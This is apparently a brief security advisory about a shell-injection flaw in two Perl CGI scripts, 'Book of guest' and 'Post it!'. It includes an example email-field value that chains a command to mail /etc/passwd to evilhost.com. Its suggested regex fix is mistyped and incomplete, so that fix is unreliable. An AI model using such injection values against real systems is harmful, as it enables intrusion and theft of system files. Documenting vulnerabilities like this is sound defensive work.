COMMAND

	Book of guest & Post it!

SYSTEMS AFFECTED

	

PROBLEM

	David Kumme found following, in Seth Leonard\'s Book of guests and  Post
	it! CGIs, available at http://www.dreamcatchersweb.com/scripts/.
	

	The problem is that this script doesn\'t filter out  ANY  metacharacters
	from the input and pass it to the shell. Therefore by writing  something
	like  email@mail.com;cat  /etc/passwd|mail  evil@evilhost.com  into  the
	email field,  the attacker could take control over the host.
	

	

SOLUTION

	patch:
	

	first of all it isn\'t a bad idea to set the permissions of  the  script
	corectly. Furthermore the line if ($INPUT{\'email\'} =~  /(.*)@(.*)/)  {
	... } should be replaced  by  something  like  if  ($INPUT{\'emai\'}  =~
	/^[\\w-.]+\\@[\\w-.]) { ... }